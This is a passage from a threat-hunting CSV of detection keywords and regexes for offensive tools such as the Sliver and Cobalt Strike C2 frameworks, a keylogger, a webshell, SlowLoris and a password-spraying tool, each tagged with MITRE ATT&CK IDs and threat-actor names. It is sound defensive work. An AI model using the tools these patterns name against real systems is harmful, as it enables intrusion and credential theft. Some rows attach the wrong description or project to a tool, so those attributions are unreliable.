Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*sleep_python_bridge.sleepy*",".{0,1000}sleep_python_bridge\.sleepy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleep_python_bridge.striker*",".{0,1000}sleep_python_bridge\.striker.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask.x64.o*",".{0,1000}sleepmask\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask.x86.o*",".{0,1000}sleepmask\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x64.o*",".{0,1000}sleepmask_pivot\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x86.o*",".{0,1000}sleepmask_pivot\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*slemire/WSPCoerce*",".{0,1000}slemire\/WSPCoerce.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*SlinkyCat.ps1*",".{0,1000}SlinkyCat\.ps1.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*SlinkyCat-main*",".{0,1000}SlinkyCat\-main.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*slip* --archive-type * --compression * --paths * --file-content *",".{0,1000}slip.{0,1000}\s\-\-archive\-type\s.{0,1000}\s\-\-compression\s.{0,1000}\s\-\-paths\s.{0,1000}\s\-\-file\-content\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*Sliver C2 Session*",".{0,1000}Sliver\sC2\sSession.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver.service*",".{0,1000}sliver\.service.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver.sh/install*",".{0,1000}sliver\.sh\/install.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver/.sliver*",".{0,1000}sliver\/\.sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver:sliver*",".{0,1000}sliver\:sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver_pcap_parser.py*",".{0,1000}sliver_pcap_parser\.py.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-bof-dev-quickstart.md*",".{0,1000}sliver\-bof\-dev\-quickstart\.md.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client.exe*",".{0,1000}sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client.log*",".{0,1000}sliver\-client\.log.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client_linux*",".{0,1000}sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client_macos*",".{0,1000}sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client_windows.exe*",".{0,1000}sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-dns*",".{0,1000}sliver\-dns.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*SliverKeylogger*",".{0,1000}SliverKeylogger.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*sliverpb*",".{0,1000}sliverpb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliverpb.Download*",".{0,1000}sliverpb\.Download.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliverpb.Services*",".{0,1000}sliverpb\.Services.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliverpb.Shell*",".{0,1000}sliverpb\.Shell.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server daemon*",".{0,1000}sliver\-server\sdaemon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server.*",".{0,1000}sliver\-server\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server.exe*",".{0,1000}sliver\-server\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server-linux.zip*",".{0,1000}sliver\-server\-linux\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server-macos.zip*",".{0,1000}sliver\-server\-macos\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server-windows.zip*",".{0,1000}sliver\-server\-windows\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*SlowLoris*",".{0,1000}SlowLoris.{0,1000}","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2342","673","2024-02-14T01:40:34Z","2015-04-26T10:00:33Z" "*slowloris.py*",".{0,1000}slowloris\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SluiEOP.ps1*",".{0,1000}SluiEOP\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*slyd0g/DLLHijackTest*",".{0,1000}slyd0g\/DLLHijackTest.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*Small Shell - Edited By KingDefacer*",".{0,1000}Small\sShell\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*smart_try_password_or_hash(*",".{0,1000}smart_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*smartbrute *kerberos*",".{0,1000}smartbrute\s.{0,1000}kerberos.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smartbrute%2520brute*",".{0,1000}smartbrute\%2520brute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*smartbrute.py*",".{0,1000}smartbrute\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*SmashedPotato.cs*",".{0,1000}SmashedPotato\.cs.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation 